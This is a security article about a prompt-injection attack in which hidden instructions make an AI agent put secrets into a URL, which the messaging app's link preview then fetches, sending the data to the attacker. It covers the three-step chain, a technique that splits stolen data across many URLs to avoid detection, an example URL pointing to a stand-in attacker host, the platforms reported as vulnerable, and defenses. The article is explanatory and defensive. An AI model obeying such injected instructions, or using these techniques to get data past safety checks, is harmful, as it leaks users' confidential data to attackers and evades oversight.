Photo by RDNE Stock project on Pexels (free license) Source

Link previews in messaging apps silently exfiltrate data from AI agents, and the attack requires zero user interaction. An attacker embeds a hidden prompt injection in content an AI agent processes. The agent generates a URL with sensitive data encoded in it. The messaging app’s link preview feature fetches that URL automatically, sending the data to the attacker’s server. No click needed. No warning shown. PromptArmor documented this attack across six major messaging platforms in February 2026, and The Register broke the story to a wider audience.

The vulnerability is not in any single AI model or messaging app. It exists at the intersection of three common design choices: giving LLMs access to external data, allowing automatic URL preview functionality, and having insufficient output filtering. Fix any one of those three, and the attack chain breaks. But right now, most enterprise AI agent deployments have all three.

Related: The Web Security Model Is Broken for AI Agents

The Three-Step Attack Chain: Injection, URL Crafting, Preview Fetch

The link preview exfiltration attack is elegant in its simplicity. It chains together three components that are each individually benign.

Step 1: Indirect prompt injection

The attacker places hidden instructions in content the AI agent will process. This could be invisible text on a web page the agent browses, hidden instructions in a document the agent summarizes, or metadata in an image the agent analyzes. The injected prompt tells the agent to encode specific sensitive data (API keys, conversation contents, file data) into a URL pointing to the attacker’s domain.

Trend Micro’s “Pandora” proof-of-concept demonstrated this with Microsoft Word documents containing hidden instructions. The instructions told the agent to collect the user’s memory context and embed it into an external URL. The document looked perfectly normal to human readers.

Step 2: The agent crafts the exfiltration URL

The compromised agent generates a response containing a URL like https://attacker.com/preview?data=BASE64_ENCODED_SECRETS. The URL is typically disguised as a helpful reference link, a documentation pointer, or a relevant resource. The agent’s response looks completely legitimate to the user. There is no visible sign that anything is wrong.

A February 2026 research paper called “Silent Egress” introduced a technique called sharded exfiltration: instead of cramming all stolen data into one URL, the attack splits it across multiple requests. Each individual URL looks innocuous, but together they reconstruct the full payload on the attacker’s server.

Here is where the attack completes without any user action. The messaging app sees a URL in the agent’s response and automatically fetches it to generate a rich preview (title, description, thumbnail). That HTTP GET request hits the attacker’s server, delivering the encoded data. The preview mechanism is a trusted system process, so it bypasses user-level security checks entirely.

The user sees a normal message with a normal-looking link preview. The exfiltration already happened.

89% Success Rate, 95% Undetected: The Silent Egress Numbers

The “Silent Egress” paper by Qianlong Lan, Anuj Kaul, Shaun Jones, and Stephanie Westrum put concrete numbers on this attack. Using a qwen2.5:7b-based agent, they achieved an 89% attack success rate across their experiments. More concerning: 95% of successful attacks were not detected by output-based safety checks.

Those numbers are not theoretical. The researchers built a functional attack pipeline and measured it. The reason detection fails is structural: the agent’s final response to the user looks completely harmless. The sensitive data is encoded in the URL, which the safety filters see as just another web link. Unless the filter specifically checks whether URL parameters contain encoded versions of data the agent has access to (which no production system currently does), the exfiltration passes unnoticed.

The sharded exfiltration variant makes detection even harder. When sensitive information is split across multiple seemingly unrelated URLs, pattern matching on individual outputs catches nothing. You would need to correlate multiple agent responses over time and reconstruct the fragments to detect the leak, a capability that does not exist in any commercially available AI safety tool today.

Related: AI Agent Prompt Injection: The Attack That Breaks Every Guardrail

Which Platforms Are Vulnerable (And Which Are Not)

PromptArmor tested AI agents across multiple messaging platforms. The results show that vulnerability depends on both the messaging app’s preview behavior and the agent’s output filtering.

Confirmed vulnerable combinations:

  • Microsoft Teams + Copilot Studio: Highest risk. Teams generates the most preview fetches, and Copilot Studio has deep access to Microsoft 365 data (Outlook, OneDrive, SharePoint, Teams chat history). The exfiltration surface is enormous.
  • Discord + OpenClaw: Vulnerable with default settings.
  • Slack + Cursor Slackbot: Vulnerable.
  • Snapchat + SnapAI: Vulnerable.
  • Telegram + OpenClaw: Vulnerable, and exposed by default.

Safer configurations:

  • Claude’s Slack app showed resistance to the attack in PromptArmor’s testing.
  • WhatsApp-based agent deployments showed reduced vulnerability.
  • Signal-based deployments in containerized environments also resisted the attack.

The Microsoft Teams + Copilot combination is the most concerning for enterprises. Varonis researchers independently discovered a related vulnerability they named EchoLeak (CVE-2025-32711, CVSS 9.3), which allowed attackers to extract sensitive information from Microsoft 365 services via Copilot by exploiting a specific Teams URL format. Microsoft patched EchoLeak, but the underlying architecture that makes these attacks possible remains.

A separate vulnerability, CVE-2026-26133, demonstrated cross-prompt injection in Microsoft 365 Copilot’s email summarization. Injected prompts could steer Copilot to pull internal Teams messages and embed them into attacker-supplied links inside email summaries.

The OWASP Framework: Least Agency as a Defense Principle

The OWASP Top 10 for Agentic Applications 2026, developed with contributions from over 100 security experts, directly addresses this attack class. Link preview exfiltration sits at the intersection of three OWASP categories: Prompt Injection, Tool Misuse, and Excessive Agency.

OWASP’s core principle for agentic security is least agency: agents should only have the minimum level of autonomy required for their defined task. This goes beyond least privilege (limiting what an agent can access) to limiting what an agent can do autonomously. An agent that can generate arbitrary URLs has more agency than it needs for most tasks.

The Securing Agentic Applications Guide 1.0 recommends specific controls relevant to link preview attacks:

  • Output filtering: Scan agent outputs for URLs containing encoded data before delivering them to the user or messaging platform.
  • URL allowlisting: Only permit the agent to generate links to known, trusted domains.
  • Human approval for elevated actions: Require explicit user confirmation before the agent generates external links.

OpenAI’s approach adds another layer: verify URLs against a public web index before auto-fetching. If a URL is already known to exist publicly and independently of the user’s conversation, it is safe to preview. If it cannot be verified, the user sees a warning. This does not eliminate the attack, but it forces the attacker to use real, publicly indexed URLs, which significantly increases the cost and traceability of the attack.

Related: OWASP Top 10 for Agentic Applications: Every Risk Explained with Real Attacks

Practical Defenses: What to Do Before Monday

If you deploy AI agents in messaging platforms:

  1. Disable link previews for AI-generated content. This is the single most effective mitigation. In OpenClaw, set linkPreview: false in your channel configuration. For custom agents, strip URLs from agent outputs before they reach the messaging layer, or mark them as no-preview.

  2. Implement URL allowlisting. Your agent should only generate links to domains you control or explicitly trust. Any URL pointing to an unknown domain in an agent’s output should be flagged and blocked.

  3. Audit Microsoft 365 Copilot integrations. If your organization uses Teams with Copilot Studio, review what data sources Copilot can access. Apply the principle of least agency: does Copilot really need access to SharePoint, OneDrive, Outlook, and Teams history simultaneously?

  4. Deploy output monitoring. Implement real-time monitoring that looks for unusual URL patterns in agent outputs, specifically URLs with long query parameters, Base64-encoded segments, or parameters that could contain fragments of sensitive data.

  5. Adopt OWASP’s agentic security framework. The OWASP Agentic AI Threats and Mitigations guide provides a structured approach. Start with a threat model that maps every data source your agents can access, every output channel they can write to, and every intermediate step where data could leak.

The link preview attack is a reminder that AI agent security is not just about what the model does. It is about the entire system: the model, the platform, the messaging app, the preview mechanism, and every automatic behavior that no one thought to question. IBM’s 2026 X-Force Threat Intelligence Index reported a 44% increase in attacks exploiting public-facing applications, partly driven by AI-enabled vulnerability discovery. The attack surface is expanding faster than defenses.

Related: ZombieAgent: The Zero-Click Exploit That Hijacks AI Agents Through Memory Poisoning

Frequently Asked Questions

AI agent link preview data exfiltration is an attack where a compromised AI agent embeds sensitive data in a URL, and the messaging app’s automatic link preview feature fetches that URL, silently sending the data to an attacker’s server without any user interaction.

PromptArmor confirmed vulnerabilities in Microsoft Teams (with Copilot Studio), Discord, Slack, Snapchat, and Telegram when used with AI agents. Microsoft Teams poses the highest risk due to Copilot’s deep access to Microsoft 365 data. Claude’s Slack integration and Signal-based deployments showed more resistance.

The most effective defenses are: disable link previews for AI-generated content, implement URL allowlisting so agents can only generate links to trusted domains, audit Microsoft 365 Copilot data access permissions, deploy output monitoring for unusual URL patterns, and adopt OWASP’s agentic security framework with least-agency principles.

What is the Silent Egress attack?

Silent Egress is a research paper demonstrating that AI agents can be manipulated via prompt injection to leak data through URLs with an 89% success rate, while 95% of successful attacks evade output-based safety checks. The paper also introduced “sharded exfiltration,” where stolen data is split across multiple requests to avoid detection.

Yes. The OWASP Top 10 for Agentic Applications 2026 covers this attack class under Prompt Injection, Tool Misuse, and Excessive Agency. OWASP recommends the principle of least agency, output filtering, URL allowlisting, and human approval for elevated actions as core defenses.